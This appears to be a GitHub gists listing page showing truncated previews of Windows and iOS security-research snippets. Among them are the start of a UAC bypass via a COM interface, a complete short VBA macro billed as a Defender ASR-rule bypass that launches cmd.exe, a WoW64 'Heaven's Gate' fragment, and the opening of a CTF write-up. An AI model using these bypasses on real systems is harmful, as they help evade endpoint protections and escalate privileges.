Task failed successfully

Coldzer0 Coldzer0

@hfiref0x
hfiref0x / akagi_58a.c
Created October 23, 2019 16:27
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
@saelo
saelo / writeup.md
Last active February 21, 2023 14:37
Writeup for the "Dezhou Instrumentz" challenge from the Real World CTF Qualifier 2019

Dezhou Instrumentz

The challenge consisted of an iOS app (Calc.app) which implemented a simple calculator. Moreover, the app also registered a custom URL scheme (icalc://) which would simply evaluate the content of the URL. The calculator was implemented using NSExpressions, and the input string would simply be parsed as such an expression and executed. NSExpressions are pretty powerful and allow, for example, calls to ObjC methods (e.g. typing in sqrt(42) would end up calling +[_NSPredicateUtilities sqrt:@42]). Further, there are two interesting helper functions available in NSExpressions:

FUNCTION(obj, 'foo', "bar")

Which will result in a call of the method 'foo' on object obj with parameter "bar" (an NSString).

@infosecn1nja
infosecn1nja / ASR Rules Bypass.vba
Last active March 3, 2024 22:28
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@AhnMo
AhnMo / http_client_get.cc
Last active March 15, 2024 09:50
Wininet HTTP Client Example
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment (lib, "Wininet.lib")
int main(int argc, char *argv[]) {
HINTERNET hSession = InternetOpen(
L"Mozilla/5.0", // User-Agent
@lucasg
lucasg / apisetlookup.c
Last active November 9, 2023 10:14
Api set library lookup resolver
#include <windows.h>
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>
#include <sal.h>
#include <assert.h>
#ifdef _X86_
#error "This snippet only build in 64-bit due to heavy use of uintptr arithmetics."
#endif
@Cr4sh
Cr4sh / WoW64_call.cpp
Created May 22, 2014 19:33
WoW64 Heaven's Gate
#include "stdafx.h"
#define DB(_val_) __asm __emit (_val_)
#define INVALID_SYSCALL (DWORD)(-1)
// code selectors
#define CS_32 0x23
#define CS_64 0x33
@martok
martok / SystemExceptionHandling.pas
Created September 10, 2013 23:06
Custom exception handler for use with FPC
unit SystemExceptionHandling;
// Inspired by what is described at FPC's forums:
// http://bugs.freepascal.org/view.php?id=12974 [^]
//
// especially in comment 0040683 by Bernd Kreuss
{$mode objfpc}{$H+}
{$AsmMode intel}